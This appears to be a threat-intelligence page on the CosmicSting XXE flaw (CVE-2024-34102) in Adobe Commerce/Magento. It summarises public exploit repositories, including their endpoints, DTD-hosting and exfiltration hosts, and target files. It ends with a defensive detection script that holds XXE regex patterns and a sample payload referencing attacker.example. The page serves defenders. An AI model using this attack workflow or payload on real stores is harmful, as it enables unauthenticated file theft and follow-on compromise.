CosmicSting
CVE-2024-34102, also known as CosmicSting, is a critical XML External Entity (XXE) vulnerability in Adobe Commerce and Magento Open Source. The provided content states that affected versions include Adobe Commerce and Magento Open Source 2.4.7, 2.4.6-p5 and earlier, 2.4.5-p7 and earlier, 2.4.4-p8 and earlier, and extended-support branches including 2.4.3-ext-7 and earlier. The flaw is described as an improper restriction of XML external entity references, where a crafted XML document referencing external entities can be processed by the application. According to the supplied reporting, exploitation is unauthenticated and does not require user interaction. The content further indicates the bug has been used in practice for arbitrary file read, theft of Magento cryptographic keys, and in some cases chaining with CVE-2024-2961 (glibc iconv/CNEXT) to obtain full remote code execution.
Exploits
12 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (2 hidden).
Repository purpose: operational PoC exploit for CVE-2024-34102 ("CosmicSting") XXE in Adobe Commerce / Magento, enabling unauthenticated out-of-band file read and exfiltration.
Structure (7 files):
- exploit.py: main exploit CLI (Python). Generates an XXE payload that references an external DTD. Supports two DTD-hosting modes: (1) upload a generated DTD to https://fars.ee/ and use the returned .dtd URL; or (2) use an attacker-controlled DTD server via --dtd-server. The DTD uses php://filter/convert.base64-encode/resource=<file> to read arbitrary files and defines an entity that forces the target to request http(s)://<callback>/?exploited=<base64>.
- server_dtd.py: attacker-side HTTP server on port 8000 that dynamically generates DTD content based on query parameters (callback, file, protocol). This avoids reliance on fars.ee and makes the exploit more reliable.
- callback_server.py: attacker-side HTTP server on port 80 that receives exfiltration requests, extracts the 'exploited' query parameter, base64-decodes it, prints the recovered file content, and saves it to a timestamped text file.
- README.md / QUICK_START.md: documentation, affected versions, usage examples, and suggested target files (e.g., /etc/passwd, Magento env.php, SSH keys, logs).
- requirements.txt: requests and rich-click dependencies.
Exploit capabilities:
- Primary: arbitrary file read via OOB XXE with external DTD and HTTP(S) exfiltration.
- Operational helpers: built-in DTD hosting server and callback receiver/decoder.
Notable targeting detail:
- The documented delivery endpoint is /rest/V1/guest-carts/1/estimate-shipping-methods (unauthenticated). The exploit expects the target to make outbound requests to fetch the DTD and to call back with exfiltrated data.
Assessment: This is a real exploit (not just detection). It is operational (usable end-to-end) but not a full framework module; the payload is parameterized mainly by file path and callback/DTD server settings.
This repository contains a Go-based exploit tool ('cosmic_sting.go') for CVE-2024-34102, a critical XXE vulnerability in Adobe Commerce (Magento) that allows remote code execution and arbitrary file read via a crafted XML payload. The tool automates the attack by generating a malicious DTD file (hosted on fars.ee), orchestrating the exfiltration of file contents from the target server, and decoding the results. It interacts with several external services (api.cvssadvisor.com for tracking/exfiltration, fars.ee for DTD hosting, and c5.rs for data exfiltration). The main exploit logic is in 'cosmic_sting.go', which is the only code file. The README provides usage instructions, including command-line flags for specifying the target URL and file to read. The exploit is operational and can be used to read arbitrary files from vulnerable Adobe Commerce installations accessible over the network.
This repository contains a proof-of-concept exploit for CVE-2024-34102, a critical XML entity injection vulnerability in Adobe Magento. The exploit is implemented in Python (PoC.py) and allows an attacker to exfiltrate arbitrary files from a vulnerable Magento instance by abusing the XML parser via a crafted JSON payload sent to a specific REST API endpoint. The attacker must provide the target Magento URL, the file path to exfiltrate, and an exfiltration server URL to receive the stolen data. The exploit works by referencing an external DTD hosted on the attacker's server, which in turn causes the target to read and base64-encode the specified file and send its contents to the attacker's exfiltration endpoint. The repository also includes a README.md with usage instructions and background information. No detection scripts or fake code are present; the exploit is a functional PoC for file exfiltration via XXE in Magento.
This repository is a proof-of-concept (POC) exploit for CVE-2024-34102, an unauthenticated XML External Entity (XXE) vulnerability in Magento. The exploit targets the /rest/V1/guest-carts/1/estimate-shipping-methods API endpoint, sending a crafted JSON payload that causes the server to process attacker-supplied XML. The included xxe.xml file demonstrates a typical XXE payload that attempts to read the /etc/passwd file from the server. The README provides a sample HTTP POST request, indicating that the exploit can be used to trigger HTTP requests to attacker-controlled webhooks, potentially exfiltrating sensitive data. The repository contains two files: a README with usage instructions and a sample XXE payload in XML format. No exploit framework is used; this is a standalone POC.
This repository provides a working exploit for CVE-2024-34102, an XXE vulnerability in Adobe Commerce (versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier). The repository contains two main Python scripts: 'exploit.py' for targeting a single instance and 'massExploit.py' for batch exploitation against multiple targets. Both scripts craft a malicious XML payload that leverages an external DTD hosted on https://fars.ee/ to trigger the XXE vulnerability. The payload causes the target server to read and base64-encode the contents of /etc/passwd, then exfiltrate this data to an attacker-controlled endpoint (https://sabatnth.c5.rs/?exploited=...). The exploit targets the '/rest/V1/guest-carts/1/estimate-shipping-methods' endpoint of Adobe Commerce. The code uses the 'fake_useragent' library to randomize the User-Agent header and disables SSL verification. The repository is operational and can be used to confirm the presence of the vulnerability and exfiltrate sensitive files from affected servers.
This repository provides a proof-of-concept (POC) exploit for CVE-2024-34102, a critical XXE vulnerability in Adobe Commerce (Magento) versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier. The main exploit logic is implemented in 'poc.py', a Python script that crafts and sends a malicious XML payload to the target's REST API endpoint, exploiting the XXE flaw to read arbitrary files (default: /etc/passwd) from the server. The exploit uses external services (fars.ee for DTD hosting and api.cvssadvisor.com for SSRF instance management and exfiltration) to facilitate the attack and confirm exploitation. Supporting Bash scripts ('check.bash', 'z_validate', 'z_compromise_check') automate checking multiple sites, validating patch status, and monitoring for compromise by tracking changes in loaded scripts. 'scripts.py' is a helper Python script for extracting script sources from target web pages. The repository is structured for both single-target and bulk/multi-site testing, with clear instructions in the README. No weaponized or framework-based automation is present; the code is a standalone POC with auxiliary scripts for detection and monitoring.
This repository contains a proof-of-concept (POC) exploit for CVE-2024-34102, a pre-authentication XML External Entity (XXE) vulnerability in Magento / Adobe Commerce. The repository consists of two files: a README.md with usage instructions and background, and cve-2024-34102.py, the main exploit script written in Python. The exploit works by:
1. Creating a malicious XML file (poc.xml) that, when processed by the vulnerable Magento endpoint, causes the target to read an arbitrary file (default: /etc/passwd) and exfiltrate its contents to the attacker's HTTP server.
2. Setting up a local HTTP server on the attacker's machine to receive the exfiltrated data.
3. Sending a crafted POST request to the Magento REST API endpoint (/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods) with the XXE payload.
4. If the target is vulnerable, it will connect back to the attacker's server and send the contents of the specified file.
The exploit requires the attacker to have a public IP and an open port for the HTTP server. The script is a functional POC and does not provide weaponized or automated post-exploitation capabilities. The main focus is on demonstrating the file read/exfiltration via XXE in Magento / Adobe Commerce.
This repository contains a Python exploit script (exploit.py) targeting CVE-2024-34102, a critical SSRF/XXE vulnerability in Adobe Commerce (versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier). The exploit allows an attacker to read arbitrary files from the server by leveraging a crafted XML payload that references an external DTD hosted on fars.ee. The script automates the process of generating the malicious DTD, hosting it, obtaining a unique SSRF instance for tracking exfiltration, sending the exploit payload to the target's /rest/V1/guest-carts/1/estimate-shipping-methods endpoint, and retrieving the exfiltrated file contents via a callback to a controlled domain. The repository includes a README.md with detailed usage instructions and a requirements.txt listing dependencies (fake_useragent, requests, rich_click). The main entry point is exploit.py, which provides a command-line interface for specifying the target URL and file to read. The exploit is operational and automates the full attack chain, including cleanup of SSRF instances.
This repository contains a Go-based exploit tool ('cosmic_sting.go') for CVE-2024-34102, a critical XXE vulnerability in Adobe Commerce (versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier). The exploit automates the process of reading arbitrary files from a vulnerable server by leveraging a crafted XML DTD file, which is hosted on a remote service (fars.ee). The tool orchestrates the attack by generating a unique DTD, uploading it, and then sending a malicious request to the target's '/rest/V1/guest-carts/1/estimate-shipping-methods' endpoint. The XXE payload causes the server to fetch and exfiltrate the contents of a specified file (e.g., /etc/passwd) to an attacker-controlled endpoint (https://{instanceId}.c5.rs). The tool then retrieves and decodes the exfiltrated data via the cvssadvisor.com API. The repository consists of a single Go source file and a README with usage instructions. The exploit is operational, providing a working file read primitive against vulnerable Adobe Commerce installations.
This repository provides a proof-of-concept (PoC) exploit for CVE-2024-34102, an XXE (XML External Entity) vulnerability in Adobe Commerce (Magento) versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier. The main exploit script, 'CVE-2024-34102.py', is a Python tool that automates the exploitation process. It allows the attacker to specify a target URL and a file path (defaulting to '/etc/hosts') to read from the server. The exploit works by sending a specially crafted XML payload to the target, which, if vulnerable, causes the server to fetch and exfiltrate the contents of the specified file to an attacker-controlled callback URL (blind XXE). The script includes logic for setting up the callback, sending the payload, and verifying exploitation. The repository also contains a README with usage instructions, example commands, and guidance for setting up a vulnerable test environment using Docker. The exploit is operational as a PoC, demonstrating file read and exfiltration via XXE, but does not include weaponized features such as arbitrary code execution or post-exploitation modules.
This repository provides an operational Python tool (cvehunter.py) for detecting and exploiting CVE-2024-34102, an unauthenticated XXE vulnerability in Adobe Magento. The tool is designed for both single-target and bulk exploitation, accepting either a single URL or a list of URLs. It uses asynchronous HTTP requests for performance and leverages an external SSRF/XXE callback service (api.cvssadvisor.com) to detect successful exploitation via out-of-band (OOB) interactions. The tool creates a callback instance, attempts exploitation, and checks for evidence of the attack in the callback service logs. The repository includes a README with usage instructions and a requirements.txt for dependencies. The main entry point is cvehunter.py, which contains all exploit logic. No hardcoded payloads are present; instead, the tool dynamically interacts with the callback service to confirm exploitation. The tool is suitable for security researchers and penetration testers targeting Magento instances for this specific vulnerability.
This repository provides a working exploit and detection script for CVE-2024-34102, a critical unauthenticated XXE vulnerability in Adobe Commerce and Magento. The exploit (exploit.py) allows an attacker to read arbitrary files from a vulnerable server by abusing the deserialization process and XXE in the Magento REST API. The attacker hosts a malicious DTD file and an OOB server to receive exfiltrated data. The exploit is operational and can be used to steal sensitive files such as app/etc/env.php, which may lead to admin access or further compromise. The repository includes two main Python scripts: 'exploit.py' (the main exploit) and 'detect.py' (for vulnerability detection). The exploit is not part of a framework and is self-contained, requiring the attacker to set up HTTP servers for DTD hosting and data exfiltration. The code is well-structured, with clear command-line options for specifying the target, file to read, and attacker-controlled servers. The README provides detailed usage instructions and context about the vulnerability and its impact.
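The descriptions above share one delivery pattern: a POST to the guest-cart estimate-shipping-methods endpoint whose JSON body carries an XML document with an external DTD or php://filter reference. As an added example (not code from the page or from any of the listed repositories), here is a small Python triage function that flags such requests in WAF or reverse-proxy records that log request bodies; the endpoint path and payload markers are taken from the descriptions, while the sample requests, the `attacker.example` host and the `note` field are constructed.

```python
# Added example, not code from the page or any listed repository: flags requests matching the
# CosmicSting (CVE-2024-34102) delivery pattern. Assumes (method, path, body) records from a WAF/proxy.
import base64, json, re

# Endpoint named in the descriptions; store-code prefix and cart id vary between PoCs.
ENDPOINT_RE = re.compile(
    r"^/rest/(?:[^/]+/)?V1/guest-carts/[^/]+/estimate-shipping-methods(?:\?|$)", re.I)
# Markers of the external-DTD / php://filter XXE payload the descriptions mention.
MARKERS = [
    (re.compile(r"<!DOCTYPE", re.I), "DOCTYPE declaration in body"),
    (re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)", re.I), "external entity declaration"),
    (re.compile(r"php://filter/", re.I), "php://filter stream wrapper"),
    (re.compile(r"https?://[^\s\"'>]+\.dtd\b", re.I), "remote .dtd reference"),
]
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def _strings(node):
    """Yield every string in a JSON document; base64-looking strings are also yielded decoded."""
    if isinstance(node, dict):
        node = list(node.values())
    if isinstance(node, list):
        for item in node:
            yield from _strings(item)
    elif isinstance(node, str):
        yield node
        if B64_RE.match(node):  # payloads are often wrapped in base64, so inspect the decoded form too
            try:
                yield base64.b64decode(node, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
                pass

def scan_request(method, path, body):
    """Return sorted reasons the request looks like a CosmicSting attempt ([] if clean)."""
    if method.upper() != "POST" or not ENDPOINT_RE.match(path):
        return []
    try:
        texts = list(_strings(json.loads(body)))
    except ValueError:
        texts = [body]  # not JSON: match against the raw body instead
    return sorted({reason for text in texts for pat, reason in MARKERS if pat.search(text)})

# Constructed samples: a harmless estimate request and one carrying a base64-wrapped XXE document.
BENIGN = ("POST", "/rest/V1/guest-carts/1/estimate-shipping-methods",
          '{"address": {"country_id": "US", "postcode": "10001"}}')
XXE_XML = '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % ext SYSTEM "http://attacker.example/x.dtd"> %ext;]><r/>'
SUSPECT = ("POST", "/rest/V1/guest-carts/1/estimate-shipping-methods",
           json.dumps({"address": {"note": base64.b64encode(XXE_XML.encode()).decode()}}))
if __name__ == "__main__":
    for req in (BENIGN, SUSPECT):
        print(req[1], scan_request(*req) or "clean")
```

Body logging is a prerequisite: a plain access log records only the path, so on its own it can at most show that the endpoint was hit.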
Recent activity
16 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An unauthenticated XXE vulnerability in Adobe Magento, mentioned as having been exploited in the wild as part of a chain with CVE-2024-2961.
A vulnerability in the Adobe Magento REST API involving improper input validation and insecure session management that allows unauthenticated attackers to enumerate, hijack, and impersonate active user sessions, including administrative sessions, and potentially gain further access via webshell deployment.
CosmicSting is referenced as the suspected initial attack vector used to inject malicious JavaScript into the Cisco Store webpage, enabling theft of payment card details and credentials.
A critical deserialization vulnerability affecting Adobe Commerce and Magento platforms that was widely exploited (per the content).